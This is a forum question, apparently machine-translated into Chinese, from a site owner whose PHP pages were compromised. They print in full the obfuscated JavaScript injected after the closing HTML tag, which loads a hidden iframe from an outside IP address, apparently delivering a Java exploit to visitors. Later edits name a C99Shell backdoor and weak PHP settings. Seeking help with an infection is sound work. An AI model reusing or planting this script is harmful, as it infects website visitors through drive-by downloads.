问题:
在我的网站上,有一些 PHP 文件都以此结尾:
<?php include 'footer.php'; ?>
在此行之前,文件中还有 HTML 代码。
当然,浏览器中的输出以此结束:
</body>
</html>
但是昨天,突然间,最后出现了一些恶意代码。我的 index.php 的输出是:
</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>
我在我的网站空间上打开了文件(通过 FTP 下载),我看到有人将这段代码直接放入了文件中!
这怎么可能发生?
我能想象的唯一方法:
- 有人知道了我的 FTP 密码。但他不会只把它放在一个文件中。他本可以造成更大的伤害。所以我无法想象会是这样。
- 我自己的电脑上有病毒。我使用 Notepad++ 进行编辑,使用 FileZilla 进行上传。也许这些程序也被污染了,我上传了恶意代码 - 不知道。
- 有人使用安全漏洞 (XSS) 将该代码放入页面。但他不可能把它直接放进文件里,不是吗?
症状:
用户报告在 Firefox 中弹出一个蓝色面板。它要求他们安装一个插件。现在他们中的一些人在他们的 PC 上安装了 Exploit.Java.CVE-2010-0886.a。
这是由于恶意代码吗?代码到底做了什么?
你能帮助我吗?
请帮帮我,我真的很绝望。
也许还有一个问题,如果你知道我怎么能得到它:我怎么能防止将来发生这样的事情?
编辑#1:
我在我的网站空间的根目录中找到了一个名为“x76x09.php”的文件。它的文件大小为 44.281 字节。我已经下载并尝试打开它。但是我的杀毒软件说是木马(Trojan.Script.224490)。我认为该文件已被执行,并将恶意代码添加到每个目录的“index.php”中。这有帮助吗?特洛伊木马怎么会进入我的空间?这是众所周知的病毒吗?
编辑#2:
我的主持人说他现在可以确定该文件不是通过 FTP 上传的。所以感染不是通过 FTP 发生的。据我的主持人说,它一定是不安全的脚本。
编辑#3:
根据 PHPSecInfo 的安全漏洞:
- allow_url_fopen = 1
- allow_url_include = 1
- 暴露_php = 1
- file_uploads = 1(这是恶意“x76x09.php”文件的罪魁祸首吗?)
- group_id = 99
- 用户 ID = 99
编辑#4:
我已经分析了在我的网络服务器上执行的文件。这是结果。
所以这个病毒似乎被称为:
- PHP/C99Shell.BF
- 后门/PHP.C99Shell
- BackDoor.Generic_c.CQA
- 木马.Script.224490
- Exploit.PHP.635
- 后门.PHP.C99Shell.bf
- 木马.Script.224490
其中一些会导致我的网站空间上的恶意文件添加了恶意代码吗?